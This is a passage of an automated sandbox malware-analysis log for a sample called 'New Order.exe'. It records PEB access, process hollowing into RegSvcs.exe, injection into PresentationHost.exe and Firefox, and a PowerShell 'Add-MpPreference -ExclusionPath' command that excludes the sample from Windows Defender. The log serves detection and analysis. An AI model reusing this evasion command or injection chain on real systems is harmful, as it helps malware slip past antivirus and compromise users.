                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FE6ACC mov eax, dword ptr fs:[00000030h]8_2_00FE6ACC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FE6ACC mov eax, dword ptr fs:[00000030h]8_2_00FE6ACC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FE6ACC mov eax, dword ptr fs:[00000030h]8_2_00FE6ACC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01038B42 mov eax, dword ptr fs:[00000030h]8_2_01038B42
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01026B40 mov eax, dword ptr fs:[00000030h]8_2_01026B40
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01026B40 mov eax, dword ptr fs:[00000030h]8_2_01026B40
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0105AB40 mov eax, dword ptr fs:[00000030h]8_2_0105AB40
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01044B4B mov eax, dword ptr fs:[00000030h]8_2_01044B4B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01044B4B mov eax, dword ptr fs:[00000030h]8_2_01044B4B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01062B57 mov eax, dword ptr fs:[00000030h]8_2_01062B57
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01062B57 mov eax, dword ptr fs:[00000030h]8_2_01062B57
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01062B57 mov eax, dword ptr fs:[00000030h]8_2_01062B57
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01062B57 mov eax, dword ptr fs:[00000030h]8_2_01062B57
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0103EB50 mov eax, dword ptr fs:[00000030h]8_2_0103EB50
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F98AA0 mov eax, dword ptr fs:[00000030h]8_2_00F98AA0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F98AA0 mov eax, dword ptr fs:[00000030h]8_2_00F98AA0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FE6AA4 mov eax, dword ptr fs:[00000030h]8_2_00FE6AA4
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FC8A90 mov edx, dword ptr fs:[00000030h]8_2_00FC8A90
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F9EA80 mov eax, dword ptr fs:[00000030h]8_2_00F9EA80
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F9EA80 mov eax, dword ptr fs:[00000030h]8_2_00F9EA80
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F9EA80 mov eax, dword ptr fs:[00000030h]8_2_00F9EA80
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F9EA80 mov eax, dword ptr fs:[00000030h]8_2_00F9EA80
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F9EA80 mov eax, dword ptr fs:[00000030h]8_2_00F9EA80
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F9EA80 mov eax, dword ptr fs:[00000030h]8_2_00F9EA80
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F9EA80 mov eax, dword ptr fs:[00000030h]8_2_00F9EA80
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F9EA80 mov eax, dword ptr fs:[00000030h]8_2_00F9EA80
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F9EA80 mov eax, dword ptr fs:[00000030h]8_2_00F9EA80
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FCCA6F mov eax, dword ptr fs:[00000030h]8_2_00FCCA6F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FCCA6F mov eax, dword ptr fs:[00000030h]8_2_00FCCA6F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FCCA6F mov eax, dword ptr fs:[00000030h]8_2_00FCCA6F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FA0A5B mov eax, dword ptr fs:[00000030h]8_2_00FA0A5B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FA0A5B mov eax, dword ptr fs:[00000030h]8_2_00FA0A5B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F96A50 mov eax, dword ptr fs:[00000030h]8_2_00F96A50
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F96A50 mov eax, dword ptr fs:[00000030h]8_2_00F96A50
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F96A50 mov eax, dword ptr fs:[00000030h]8_2_00F96A50
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F96A50 mov eax, dword ptr fs:[00000030h]8_2_00F96A50
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F96A50 mov eax, dword ptr fs:[00000030h]8_2_00F96A50
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F96A50 mov eax, dword ptr fs:[00000030h]8_2_00F96A50
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F96A50 mov eax, dword ptr fs:[00000030h]8_2_00F96A50
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01044BB0 mov eax, dword ptr fs:[00000030h]8_2_01044BB0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01044BB0 mov eax, dword ptr fs:[00000030h]8_2_01044BB0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FCCA38 mov eax, dword ptr fs:[00000030h]8_2_00FCCA38
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FB4A35 mov eax, dword ptr fs:[00000030h]8_2_00FB4A35
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FB4A35 mov eax, dword ptr fs:[00000030h]8_2_00FB4A35
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0103EBD0 mov eax, dword ptr fs:[00000030h]8_2_0103EBD0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FBEA2E mov eax, dword ptr fs:[00000030h]8_2_00FBEA2E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FCCA24 mov eax, dword ptr fs:[00000030h]8_2_00FCCA24
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0101CBF0 mov eax, dword ptr fs:[00000030h]8_2_0101CBF0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FBEBFC mov eax, dword ptr fs:[00000030h]8_2_00FBEBFC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F98BF0 mov eax, dword ptr fs:[00000030h]8_2_00F98BF0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F98BF0 mov eax, dword ptr fs:[00000030h]8_2_00F98BF0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F98BF0 mov eax, dword ptr fs:[00000030h]8_2_00F98BF0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0101CA11 mov eax, dword ptr fs:[00000030h]8_2_0101CA11
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FB0BCB mov eax, dword ptr fs:[00000030h]8_2_00FB0BCB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FB0BCB mov eax, dword ptr fs:[00000030h]8_2_00FB0BCB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FB0BCB mov eax, dword ptr fs:[00000030h]8_2_00FB0BCB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F90BCD mov eax, dword ptr fs:[00000030h]8_2_00F90BCD
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F90BCD mov eax, dword ptr fs:[00000030h]8_2_00F90BCD
                Source: C:\Users\user\Desktop\New Order.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeMemory allocated: page read and write | page guardJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Source: C:\Users\user\Desktop\New Order.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\New Order.exe"
                Source: C:\Users\user\Desktop\New Order.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\New Order.exe"Jump to behavior
                Source: C:\Users\user\Desktop\New Order.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 protect: page execute and read and writeJump to behavior
                Source: C:\Program Files (x86)\skTmzWnqHCUyfoWiLLEjourpbIyTFtNZHLKACPUDeVzDGrkQTFGfGkYnPluvtZjEQmAIHN\9WAxm5F77VClmSoGxi.exeNtCreateFile: Direct from: 0x77752FECJump to behavior
                Source: C:\Program Files (x86)\skTmzWnqHCUyfoWiLLEjourpbIyTFtNZHLKACPUDeVzDGrkQTFGfGkYnPluvtZjEQmAIHN\9WAxm5F77VClmSoGxi.exeNtOpenFile: Direct from: 0x77752DCCJump to behavior
                Source: C:\Program Files (x86)\skTmzWnqHCUyfoWiLLEjourpbIyTFtNZHLKACPUDeVzDGrkQTFGfGkYnPluvtZjEQmAIHN\9WAxm5F77VClmSoGxi.exeNtSetInformationThread: Direct from: 0x777463F9Jump to behavior
                Source: C:\Program Files (x86)\skTmzWnqHCUyfoWiLLEjourpbIyTFtNZHLKACPUDeVzDGrkQTFGfGkYnPluvtZjEQmAIHN\9WAxm5F77VClmSoGxi.exeNtQueryInformationToken: Direct from: 0x77752CACJump to behavior
                Source: C:\Program Files (x86)\skTmzWnqHCUyfoWiLLEjourpbIyTFtNZHLKACPUDeVzDGrkQTFGfGkYnPluvtZjEQmAIHN\9WAxm5F77VClmSoGxi.exeNtTerminateThread: Direct from: 0x77752FCCJump to behavior
                Source: C:\Program Files (x86)\skTmzWnqHCUyfoWiLLEjourpbIyTFtNZHLKACPUDeVzDGrkQTFGfGkYnPluvtZjEQmAIHN\9WAxm5F77VClmSoGxi.exeNtProtectVirtualMemory: Direct from: 0x77752F9CJump to behavior
                Source: C:\Program Files (x86)\skTmzWnqHCUyfoWiLLEjourpbIyTFtNZHLKACPUDeVzDGrkQTFGfGkYnPluvtZjEQmAIHN\9WAxm5F77VClmSoGxi.exeNtSetInformationProcess: Direct from: 0x77752C5CJump to behavior
                Source: C:\Program Files (x86)\skTmzWnqHCUyfoWiLLEjourpbIyTFtNZHLKACPUDeVzDGrkQTFGfGkYnPluvtZjEQmAIHN\9WAxm5F77VClmSoGxi.exeNtNotifyChangeKey: Direct from: 0x77753C2CJump to behavior
                Source: C:\Program Files (x86)\skTmzWnqHCUyfoWiLLEjourpbIyTFtNZHLKACPUDeVzDGrkQTFGfGkYnPluvtZjEQmAIHN\9WAxm5F77VClmSoGxi.exeNtOpenKeyEx: Direct from: 0x77752B9CJump to behavior
                Source: C:\Program Files (x86)\skTmzWnqHCUyfoWiLLEjourpbIyTFtNZHLKACPUDeVzDGrkQTFGfGkYnPluvtZjEQmAIHN\9WAxm5F77VClmSoGxi.exeNtOpenSection: Direct from: 0x77752E0CJump to behavior
                Source: C:\Program Files (x86)\skTmzWnqHCUyfoWiLLEjourpbIyTFtNZHLKACPUDeVzDGrkQTFGfGkYnPluvtZjEQmAIHN\9WAxm5F77VClmSoGxi.exeNtProtectVirtualMemory: Direct from: 0x77747B2EJump to behavior
                Source: C:\Program Files (x86)\skTmzWnqHCUyfoWiLLEjourpbIyTFtNZHLKACPUDeVzDGrkQTFGfGkYnPluvtZjEQmAIHN\9WAxm5F77VClmSoGxi.exeNtAllocateVirtualMemory: Direct from: 0x777548ECJump to behavior
                Source: C:\Program Files (x86)\skTmzWnqHCUyfoWiLLEjourpbIyTFtNZHLKACPUDeVzDGrkQTFGfGkYnPluvtZjEQmAIHN\9WAxm5F77VClmSoGxi.exeNtQueryVolumeInformationFile: Direct from: 0x77752F2CJump to behavior
                Source: C:\Program Files (x86)\skTmzWnqHCUyfoWiLLEjourpbIyTFtNZHLKACPUDeVzDGrkQTFGfGkYnPluvtZjEQmAIHN\9WAxm5F77VClmSoGxi.exeNtQuerySystemInformation: Direct from: 0x777548CCJump to behavior
                Source: C:\Program Files (x86)\skTmzWnqHCUyfoWiLLEjourpbIyTFtNZHLKACPUDeVzDGrkQTFGfGkYnPluvtZjEQmAIHN\9WAxm5F77VClmSoGxi.exeNtAllocateVirtualMemory: Direct from: 0x77752BECJump to behavior
                Source: C:\Program Files (x86)\skTmzWnqHCUyfoWiLLEjourpbIyTFtNZHLKACPUDeVzDGrkQTFGfGkYnPluvtZjEQmAIHN\9WAxm5F77VClmSoGxi.exeNtDeviceIoControlFile: Direct from: 0x77752AECJump to behavior
                Source: C:\Program Files (x86)\skTmzWnqHCUyfoWiLLEjourpbIyTFtNZHLKACPUDeVzDGrkQTFGfGkYnPluvtZjEQmAIHN\9WAxm5F77VClmSoGxi.exeNtCreateUserProcess: Direct from: 0x7775371CJump to behavior
                Source: C:\Program Files (x86)\skTmzWnqHCUyfoWiLLEjourpbIyTFtNZHLKACPUDeVzDGrkQTFGfGkYnPluvtZjEQmAIHN\9WAxm5F77VClmSoGxi.exeNtWriteVirtualMemory: Direct from: 0x7775490CJump to behavior
                Source: C:\Program Files (x86)\skTmzWnqHCUyfoWiLLEjourpbIyTFtNZHLKACPUDeVzDGrkQTFGfGkYnPluvtZjEQmAIHN\9WAxm5F77VClmSoGxi.exeNtQueryInformationProcess: Direct from: 0x77752C26Jump to behavior
                Source: C:\Program Files (x86)\skTmzWnqHCUyfoWiLLEjourpbIyTFtNZHLKACPUDeVzDGrkQTFGfGkYnPluvtZjEQmAIHN\9WAxm5F77VClmSoGxi.exeNtResumeThread: Direct from: 0x77752FBCJump to behavior
                Source: C:\Program Files (x86)\skTmzWnqHCUyfoWiLLEjourpbIyTFtNZHLKACPUDeVzDGrkQTFGfGkYnPluvtZjEQmAIHN\9WAxm5F77VClmSoGxi.exeNtReadVirtualMemory: Direct from: 0x77752E8CJump to behavior
                Source: C:\Program Files (x86)\skTmzWnqHCUyfoWiLLEjourpbIyTFtNZHLKACPUDeVzDGrkQTFGfGkYnPluvtZjEQmAIHN\9WAxm5F77VClmSoGxi.exeNtCreateKey: Direct from: 0x77752C6CJump to behavior
                Source: C:\Program Files (x86)\skTmzWnqHCUyfoWiLLEjourpbIyTFtNZHLKACPUDeVzDGrkQTFGfGkYnPluvtZjEQmAIHN\9WAxm5F77VClmSoGxi.exeNtSetInformationThread: Direct from: 0x77752B4CJump to behavior
                Source: C:\Program Files (x86)\skTmzWnqHCUyfoWiLLEjourpbIyTFtNZHLKACPUDeVzDGrkQTFGfGkYnPluvtZjEQmAIHN\9WAxm5F77VClmSoGxi.exeNtQueryAttributesFile: Direct from: 0x77752E6CJump to behavior
                Source: C:\Program Files (x86)\skTmzWnqHCUyfoWiLLEjourpbIyTFtNZHLKACPUDeVzDGrkQTFGfGkYnPluvtZjEQmAIHN\9WAxm5F77VClmSoGxi.exeNtAllocateVirtualMemory: Direct from: 0x77753C9CJump to behavior
                Source: C:\Program Files (x86)\skTmzWnqHCUyfoWiLLEjourpbIyTFtNZHLKACPUDeVzDGrkQTFGfGkYnPluvtZjEQmAIHN\9WAxm5F77VClmSoGxi.exeNtClose: Direct from: 0x77752B6C
                Source: C:\Program Files (x86)\skTmzWnqHCUyfoWiLLEjourpbIyTFtNZHLKACPUDeVzDGrkQTFGfGkYnPluvtZjEQmAIHN\9WAxm5F77VClmSoGxi.exeNtUnmapViewOfSection: Direct from: 0x77752D3CJump to behavior
                Source: C:\Program Files (x86)\skTmzWnqHCUyfoWiLLEjourpbIyTFtNZHLKACPUDeVzDGrkQTFGfGkYnPluvtZjEQmAIHN\9WAxm5F77VClmSoGxi.exeNtCreateMutant: Direct from: 0x777535CCJump to behavior
                Source: C:\Program Files (x86)\skTmzWnqHCUyfoWiLLEjourpbIyTFtNZHLKACPUDeVzDGrkQTFGfGkYnPluvtZjEQmAIHN\9WAxm5F77VClmSoGxi.exeNtWriteVirtualMemory: Direct from: 0x77752E3CJump to behavior
                Source: C:\Program Files (x86)\skTmzWnqHCUyfoWiLLEjourpbIyTFtNZHLKACPUDeVzDGrkQTFGfGkYnPluvtZjEQmAIHN\9WAxm5F77VClmSoGxi.exeNtMapViewOfSection: Direct from: 0x77752D1CJump to behavior
                Source: C:\Program Files (x86)\skTmzWnqHCUyfoWiLLEjourpbIyTFtNZHLKACPUDeVzDGrkQTFGfGkYnPluvtZjEQmAIHN\9WAxm5F77VClmSoGxi.exeNtResumeThread: Direct from: 0x777536ACJump to behavior
                Source: C:\Program Files (x86)\skTmzWnqHCUyfoWiLLEjourpbIyTFtNZHLKACPUDeVzDGrkQTFGfGkYnPluvtZjEQmAIHN\9WAxm5F77VClmSoGxi.exeNtReadFile: Direct from: 0x77752ADCJump to behavior
                Source: C:\Program Files (x86)\skTmzWnqHCUyfoWiLLEjourpbIyTFtNZHLKACPUDeVzDGrkQTFGfGkYnPluvtZjEQmAIHN\9WAxm5F77VClmSoGxi.exeNtQuerySystemInformation: Direct from: 0x77752DFCJump to behavior
                Source: C:\Program Files (x86)\skTmzWnqHCUyfoWiLLEjourpbIyTFtNZHLKACPUDeVzDGrkQTFGfGkYnPluvtZjEQmAIHN\9WAxm5F77VClmSoGxi.exeNtDelayExecution: Direct from: 0x77752DDCJump to behavior
                Source: C:\Program Files (x86)\skTmzWnqHCUyfoWiLLEjourpbIyTFtNZHLKACPUDeVzDGrkQTFGfGkYnPluvtZjEQmAIHN\9WAxm5F77VClmSoGxi.exeNtAllocateVirtualMemory: Direct from: 0x77752BFCJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 value starts with: 4D5AJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeSection loaded: NULL target: C:\Program Files (x86)\skTmzWnqHCUyfoWiLLEjourpbIyTFtNZHLKACPUDeVzDGrkQTFGfGkYnPluvtZjEQmAIHN\9WAxm5F77VClmSoGxi.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeSection loaded: NULL target: C:\Windows\SysWOW64\PresentationHost.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\PresentationHost.exeSection loaded: NULL target: C:\Program Files (x86)\skTmzWnqHCUyfoWiLLEjourpbIyTFtNZHLKACPUDeVzDGrkQTFGfGkYnPluvtZjEQmAIHN\9WAxm5F77VClmSoGxi.exe protection: read writeJump to behavior
                Source: C:\Windows\SysWOW64\PresentationHost.exeSection loaded: NULL target: C:\Program Files (x86)\skTmzWnqHCUyfoWiLLEjourpbIyTFtNZHLKACPUDeVzDGrkQTFGfGkYnPluvtZjEQmAIHN\9WAxm5F77VClmSoGxi.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\PresentationHost.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
                Source: C:\Windows\SysWOW64\PresentationHost.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\PresentationHost.exeThread register set: target process: 3172Jump to behavior
                Source: C:\Windows\SysWOW64\PresentationHost.exeThread APC queued: target process: C:\Program Files (x86)\skTmzWnqHCUyfoWiLLEjourpbIyTFtNZHLKACPUDeVzDGrkQTFGfGkYnPluvtZjEQmAIHN\9WAxm5F77VClmSoGxi.exeJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000Jump to behavior
                Source: C:\Users\user\Desktop\New Order.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 401000Jump to behavior
                Source: C:\Users\user\Desktop\New Order.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 6A5008Jump to behavior
                Source: C:\Users\user\Desktop\New Order.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\New Order.exe"Jump to behavior
                Source: C:\Users\user\Desktop\New Order.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"Jump to behavior
                Source: C:\Users\user\Desktop\New Order.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"Jump to behavior
                Source: C:\Program Files (x86)\skTmzWnqHCUyfoWiLLEjourpbIyTFtNZHLKACPUDeVzDGrkQTFGfGkYnPluvtZjEQmAIHN\9WAxm5F77VClmSoGxi.exeProcess created: C:\Windows\SysWOW64\PresentationHost.exe "C:\Windows\SysWOW64\PresentationHost.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\PresentationHost.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
                Source: 9WAxm5F77VClmSoGxi.exe, 0000000D.00000002.2433021048.0000000001961000.00000002.00000001.00040000.00000000.sdmp, 9WAxm5F77VClmSoGxi.exe, 0000000D.00000000.1599199890.0000000001961000.00000002.00000001.00040000.00000000.sdmp, 9WAxm5F77VClmSoGxi.exe, 0000000F.00000000.1746987360.0000000000C31000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: XProgram Manager
                Source: 9WAxm5F77VClmSoGxi.exe, 0000000D.00000002.2433021048.0000000001961000.00000002.00000001.00040000.00000000.sdmp, 9WAxm5F77VClmSoGxi.exe, 0000000D.00000000.1599199890.0000000001961000.00000002.00000001.00040000.00000000.sdmp, 9WAxm5F77VClmSoGxi.exe, 0000000F.00000000.1746987360.0000000000C31000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
                Source: 9WAxm5F77VClmSoGxi.exe, 0000000D.00000002.2433021048.0000000001961000.00000002.00000001.00040000.00000000.sdmp, 9WAxm5F77VClmSoGxi.exe, 0000000D.00000000.1599199890.0000000001961000.00000002.00000001.00040000.00000000.sdmp, 9WAxm5F77VClmSoGxi.exe, 0000000F.00000000.1746987360.0000000000C31000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
                Source: 9WAxm5F77VClmSoGxi.exe, 0000000D.00000002.2433021048.0000000001961000.00000002.00000001.00040000.00000000.sdmp, 9WAxm5F77VClmSoGxi.exe, 0000000D.00000000.1599199890.0000000001961000.00000002.00000001.00040000.00000000.sdmp, 9WAxm5F77VClmSoGxi.exe, 0000000F.00000000.1746987360.0000000000C31000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
                Source: C:\Users\user\Desktop\New Order.exeQueries volume information: C:\Users\user\Desktop\New Order.exe VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeQueries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeQueries volume information: C:\Windows\Fonts\Candaral.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeQueries volume information: C:\Windows\Fonts\Candarali.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformationJump to behavior
